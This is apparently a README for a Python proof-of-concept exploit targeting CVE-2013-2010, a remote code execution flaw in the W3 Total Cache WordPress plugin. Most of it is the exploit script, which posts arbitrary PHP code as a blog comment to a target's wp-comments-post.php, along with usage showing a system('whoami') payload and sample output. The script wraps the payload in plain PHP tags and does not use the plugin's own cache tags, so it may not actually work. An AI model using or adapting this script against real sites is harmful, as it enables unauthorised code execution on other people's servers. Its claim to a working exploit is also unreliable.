Remote code execution running on w3 total cache cve 2013-2010# w3-total-cache-cve-2013-2010
Remote code execution running on w3 total cache cve 2013-2010
Usage:
python3 w3tc_rce_exploit.py -u http://example.com -p "system('whoami');"
Output:
[*] Targeting: http://example.com
[+] Payload sent successfully.
[+] Check the target for execution of the payload.
-----------
import requests
import argparse
def exploit_rce(target_url, payload):
"""Exploit the RCE vulnerability by sending a crafted comment."""
# Construct the URL for posting a comment
post_url = f"{target_url}/wp-comments-post.php"
# Prepare the payload for the comment
data = {
'author': 'attacker',
'email': 'attacker@example.com',
'url': 'http://example.com',
'comment': payload,
'submit': 'Submit Comment',
'post_id': 1 # Assuming post ID 1 exists; adjust as necessary
}
try:
# Send the POST request
response = requests.post(post_url, data=data)
if response.status_code == 200:
print("[+] Payload sent successfully.")
print("[+] Check the target for execution of the payload.")
else:
print("[-] Failed to send payload.")
print(f"Status Code: {response.status_code}")
except Exception as e:
print(f"Error during exploitation: {str(e)}")
def main():
parser = argparse.ArgumentParser(description='Exploit CVE-2013-2010 in W3 Total Cache')
parser.add_argument('-u', '--url', required=True, help='Target WordPress URL')
parser.add_argument('-p', '--payload', required=True, help='PHP code to execute')
args = parser.parse_args()
target_url = args.url.rstrip('/')
# Construct a malicious payload (e.g., a simple PHP command)
php_payload = f"<?php {args.payload} ?>"
print(f"[*] Targeting: {target_url}")
exploit_rce(target_url, php_payload)
if __name__ == "__main__":
main()
[4.0K] /data/pocs/2ceb6053160c7bf49e26a3740a3df3fbb858c869
└── [1.9K] README.md
0 directories, 1 file